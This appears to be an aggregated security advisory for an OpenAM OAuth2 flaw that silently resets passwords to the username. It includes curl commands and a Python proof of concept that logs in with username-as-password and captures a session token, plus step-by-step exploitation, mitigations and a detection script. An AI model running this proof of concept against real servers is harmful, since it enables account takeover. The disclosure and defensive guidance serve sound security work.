OpenAM, Unverified Password Change (CWE-620) and Use of Weak Credentials (CWE-1391), CVE-2026-XXXX (Critical) - DC-Jun2026-676


How CVE-2026-XXXX Works

The vulnerability resides in OpenAM Community Edition’s OAuth2 authentication module, specifically in the account linking and update logic that fires during OAuth2 re-login of an existing local account.
When a user authenticates via OAuth2 and the identity provider’s profile resolves against an existing local identifier, OpenAM’s account update path is triggered. This path contains a critical flaw: it silently rewrites the user’s local password to the literal string of their username without any verification, re-authentication, or confirmation (CWE-620: Unverified Password Change). The module then persists these weak credentials (CWE-1391: Use of Weak Credentials).
For new users, the password rewrite typically fires after two OAuth logins. For pre-existing users whose IdP profile matches an existing local identifier, the rewrite happens on the very first re-login. The default `ldapService` authentication chain then accepts the username as both the identifier and the password, allowing an unauthenticated attacker to obtain a valid session via the standard authenticate endpoint.
For usernames shorter than the default minimum password length, the rewrite is silently denied, so accounts with very short names (including short administrative accounts) are not affected. Additionally, the same update path marks the account active on every OAuth login, silently reactivating disabled accounts.
Successful exploitation grants the attacker a session carrying the victim principal’s privileges, enabling full account takeover and lateral movement within the IAM infrastructure.

DailyCVE Form

Platform: OpenAM Community Edition
Version: through 16.0.6
Vulnerability: Unverified Password Change + Weak Credentials
Severity: Critical
Date: 2026-06-26

Prediction: 2026-06-30

What Undercode Say

```bash
# Check OpenAM version
curl -s http://target:8080/openam/version | grep "Version"

# Verify OAuth2 module is enabled
curl -s http://target:8080/openam/oauth2/.well-known/openid-configuration | jq .

# Test for vulnerability - attempt authentication with username as password
curl -X POST http://target:8080/openam/json/realms/root/authenticate \
  -H "Content-Type: application/json" \
  -d '{"username":"victim","password":"victim"}'

# If successful, capture the tokenId from the response
# tokenId: AQIC5wM2... (session token)
```
Python PoC - Unauthenticated session hijacking

```python
import requests

target = "http://target:8080"
username = "target_user"

# Attempt authentication with username as password
resp = requests.post(
    f"{target}/openam/json/realms/root/authenticate",
    json={"username": username, "password": username},
    headers={"Content-Type": "application/json"},
)

if resp.status_code == 200:
    token = resp.json().get("tokenId")
    print(f"[+] Session obtained for {username}: {token}")

    # Validate session
    session_check = requests.post(
        f"{target}/openam/json/sessions/{token}",
        headers={"Authorization": f"Bearer {token}"},
    )
    print(f"[+] Session valid: {session_check.status_code == 200}")
else:
    print("[-] Not vulnerable or user not affected")
```

Exploit

  1. Identify target – Enumerate valid usernames through OpenAM’s user query endpoints or IdP profile resolution
  2. Trigger OAuth2 flow – Initiate OAuth2 authorization against the target realm with a known IdP profile that resolves to the victim’s local account
  3. Password rewrite – The OAuth2 module silently sets victim’s password to their username string
  4. Authenticate – Use the standard `/json/realms/root/authenticate` endpoint with both username and password set to the victim’s username
  5. Session capture – Receive a valid session token (tokenId) carrying the victim’s privileges
  6. Impersonate – Use the captured session to access protected resources, administrative endpoints, or perform privilege escalation

Protection

  • Immediate: Upgrade to OpenAM Community Edition version 16.1.1 or higher
  • Workaround: Disable account creation in OAuth2 authentication module (non-default configuration)
  • Workaround: Enforce minimum password length greater than typical username length to prevent the rewrite
  • Workaround: Remove `ldapService` from the default authentication chain
  • Monitoring: Audit OAuth2 authentication logs for unusual re-login patterns
  • Monitoring: Watch for authentication attempts where username equals password
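The two monitoring and workaround items above can be checked mechanically. The following is an added example, not code from the advisory or from OpenAM: it inspects JSON bodies posted to the authenticate endpoint (as a reverse proxy or WAF in front of OpenAM would see them) for the username-equals-password pattern, and lists which local accounts a given minimum password length still leaves exposed to the rewrite. The sample request bodies and usernames are constructed, and the case-insensitive comparison is an assumption about how the directory matches usernames.

```python
import json

# Constructed sample: bodies posted to /json/realms/root/authenticate,
# as captured by a proxy in front of OpenAM (not real traffic).
SAMPLE_AUTH_BODIES = [
    '{"username":"alice","password":"alice"}',
    '{"username":"bob","password":"S3cure!Pass"}',
    '{"username":"Carol","password":"carol"}',
    'not-json',
]


def username_equals_password(body: str) -> bool:
    """True when an authenticate request carries the weak-credential
    pattern the rewrite produces (password == username).  The
    case-insensitive match is an assumption about directory matching."""
    try:
        doc = json.loads(body)
    except (ValueError, TypeError):
        return False
    if not isinstance(doc, dict):
        return False
    user, pw = doc.get("username"), doc.get("password")
    if not isinstance(user, str) or not isinstance(pw, str):
        return False
    return user.casefold() == pw.casefold()


def flag_requests(bodies):
    """Usernames from every request matching the weak-credential pattern;
    these are the events the 'username equals password' monitoring item
    asks for."""
    return [json.loads(b)["username"] for b in bodies
            if username_equals_password(b)]


def accounts_at_risk(usernames, min_password_length):
    """Accounts whose username is at least as long as the minimum password
    length: for these the rewrite is accepted, so raising the minimum above
    the longest username (the workaround above) empties this list."""
    return sorted(u for u in usernames if len(u) >= min_password_length)
```

Run `accounts_at_risk` against the full local account list before choosing a minimum password length, since the page notes that only usernames shorter than that minimum are protected by the silent denial.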

Impact

  • Authentication Bypass: Unauthenticated attackers gain valid sessions for any affected user account
  • Account Takeover: Full compromise of victim accounts with their associated privileges
  • Privilege Escalation: Low-privileged users can escalate to higher-privileged accounts
  • Data Breach: Access to sensitive identity data, tokens, and federated resources
  • Lateral Movement: Attackers can pivot to connected systems and applications using the compromised IAM session
  • Compliance Violation: Breach of GDPR, HIPAA, and other regulatory requirements due to unauthorized access to PII
  • Business Disruption: Potential for denial of service through account lockouts or malicious administrative actions

Sources:

Reported By: github.com